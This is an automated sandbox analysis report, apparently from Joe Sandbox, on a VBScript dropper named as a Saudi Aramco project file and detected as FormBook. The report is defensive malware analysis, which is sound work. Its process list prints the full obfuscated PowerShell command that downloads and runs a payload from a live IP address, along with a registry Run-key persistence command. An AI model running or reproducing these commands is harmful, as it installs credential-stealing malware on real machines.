Windows
Analysis Report
PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbs
Overview
General Information
Detection
FormBook
Score | Range | Whitelisted | Confidence
---|---|---|---
100 | 0 - 100 | false | 100%
Signatures
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Powershell download and execute
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Drops PE files with a suspicious file extension
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Drops PE files to the document folder of the user
Injects a PE file into a foreign processes
Powershell drops PE file
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Uses reg.exe to modify the Windows registry
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 4760 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PROJECT-_SAUDI_ARAMCO_DRAWING_AND_SPECS.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- cmd.exe (PID: 5464 cmdline: C:\Windows\System32\cmd.exe" /c "powERshELl -WINd hI -ExeCut BypAss while($true){try{Start-Process 'powershell.exe' -WindowStyle hidden -Verb runas -ArgumentList '-exec Bypass -c', '$c1=''iex (New-Object Net.We''; $c4=''bClient).Downlo''; $c3=''adString(''''http://212.192.219.52/Untitled2.bmp'''')'';I`E`X ($c1,$c4,$c3 -Join '''')' ;exit}catch{}} MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5780 cmdline: powERshELl -WINd hI -ExeCut BypAss while($true){try{Start-Process 'powershell.exe' -WindowStyle hidden -Verb runas -ArgumentList '-exec Bypass -c', '$c1=''iex (New-Object Net.We''; $c4=''bClient).Downlo''; $c3=''adString(''''http://212.192.219.52/Untitled2.bmp'''')'';I`E`X ($c1,$c4,$c3 -Join '''')' ;exit}catch{}} MD5: 95000560239032BC68B4C2FDFCDEF913)
- powershell.exe (PID: 6672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass -c $c1='iex (New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://212.192.219.52/Untitled2.bmp'')';I`E`X ($c1,$c4,$c3 -Join '') MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- ServiceHub.exe (PID: 7164 cmdline: "C:\Users\user\AppData\Roaming\ServiceHub.exe" MD5: 092A9C604129484DE0CE5F2FB3C450D1)
- cmd.exe (PID: 5076 cmdline: C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ServiceHub" /t REG_SZ /F /D "C:\Users\user\Documents\ServiceHub.pif MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- reg.exe (PID: 6708 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "ServiceHub" /t REG_SZ /F /D "C:\Users\user\Documents\ServiceHub.pif" MD5: CEE2A7E57DF2A159A065A34913A055C2)
- ServiceHub.exe (PID: 6768 cmdline: C:\Users\user\AppData\Roaming\ServiceHub.exe MD5: 092A9C604129484DE0CE5F2FB3C450D1)
- ServiceHub.pif (PID: 3316 cmdline: "C:\Users\user\Documents\ServiceHub.pif" MD5: 092A9C604129484DE0CE5F2FB3C450D1)
- msiexec.exe (PID: 7072 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
- ServiceHub.pif (PID: 6996 cmdline: "C:\Users\user\Documents\ServiceHub.pif" MD5: 092A9C604129484DE0CE5F2FB3C450D1)
- ServiceHub.pif (PID: 5136 cmdline: C:\Users\user\Documents\ServiceHub.pif MD5: 092A9C604129484DE0CE5F2FB3C450D1)
- explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- ServiceHub.pif (PID: 1792 cmdline: C:\Users\user\Documents\ServiceHub.pif MD5: 092A9C604129484DE0CE5F2FB3C450D1)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | |

No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

No Sigma rule has matched

No Snort rule has matched
AV Detection | |
---|---|
Source: | File source: |
Source: | File source: |
Source: | File source: |
Source: | File source: |
Source: | File source: |
Source: | File source: |
Source: | File source: |
Source: | Avira URL Cloud: |
Source: | Avira: |
Source: | Avira: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Binary string: |
Networking | |
---|---|
Source: | Network Connect: |
Source: | Domain query: |
Source: | Network Connect: |
Source: | Network Connect: |
Source: | Network Connect: |
Source: | Domain query: |
Source: | Domain query: |
Source: | Network Connect: |
Source: | Domain query: |
Source: | Domain query: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |